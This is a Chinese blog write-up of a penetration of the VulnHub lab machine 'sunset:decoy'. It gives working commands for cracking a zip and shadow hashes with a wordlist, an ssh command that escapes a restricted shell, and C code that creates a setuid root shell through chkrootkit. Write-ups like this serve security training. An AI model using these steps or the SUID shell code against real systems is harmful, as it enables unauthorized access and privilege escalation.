sunset:decoy-vulnhub靶机渗透

前言

sunset:decoy靶机渗透

考点:john爆破

​ 突破rbash

​ Chkrootkit提权

靶机IP:192.168.1.123

渗透过程

扫描端口

image-20200719195156897

可以看到这里有一个zip包,访问80端口,下载下来,解密zip包

1
fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt save.zip

密码:manuel

解压获得shadow等文件

image-20200719195629013

使用john解密后获得密码server

ssh连接

image-20200719195738775

这里是一个rbash,解决如下:

1
2
3
ssh 296640a3b825115a47b68fc44501c828@192.168.1.123 -t “bash --noprofile”

export PATH=/bin:/usr/bin:$PATH

SV-502/logs/log.txt

image-20200719195951553

发现解压过这个文件

image-20200719200052517

此处有提权,在honeypot.decoy

image-20200719200155267

选择5,启用工具chkrootkit

提权的话,在tmp下创建update.c

1
2
3
4
5
6
7
8
9
10
11
#include <unistd.h>

void main(void)
{
system("chown root:root /tmp/update");
system("chmod 4755 /tmp/update");
setuid(0);
setgid(0);
execl("/bin/sh","sh",NULL);

}
1
gcc update.c -o update

然后运行update

image-20200719200526930

提权成功

Author: 我是小吴啦
Link: http://yoursite.com/2020/07/19/sunset-decoy-vulnhub%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.